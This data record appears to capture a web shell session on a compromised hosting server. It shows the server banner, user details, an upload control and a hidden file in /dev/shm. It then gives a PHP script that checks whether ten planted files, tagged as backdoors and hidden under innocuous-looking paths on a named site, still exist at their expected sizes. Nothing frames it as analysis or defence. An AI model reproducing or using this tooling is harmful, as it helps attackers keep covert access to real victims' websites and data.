{'id': 183207, 'code': 'Y2gQopBX HEX
HEX
Server: LiteSpeed
System: Linux premium241.web-hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User: aurelytl (1710)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //dev/shm/.dat
<?php   $r = '/home/codecjfq/wms.codecraftsoftwares.com'; $x = ["/modules/sales/emailBugReport.order.php"=>"bd@@1475844@@1036",
"/warehouse/configuration.php"=>"bd@@1479189@@904",
"/inventory/busi.report03.php"=>"bd@@1479218@@974",
"/.well-known/pki-validation/pms_send.php"=>"bd@@1475903@@964",
"/database/list.tag.php"=>"bd@@1475942@@876",
"/config/comment.php"=>"bd@@1475973@@859",
"/modules/menu_lingua.php"=>"bd@@1479099@@918",
"/modules/warehouse/scheduler.order.php"=>"bd@@1475782@@945",
"/.well-known/nggshow.php"=>"bd@@1479121@@875",
"/public/busi.php"=>"bd@@1479157@@948"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');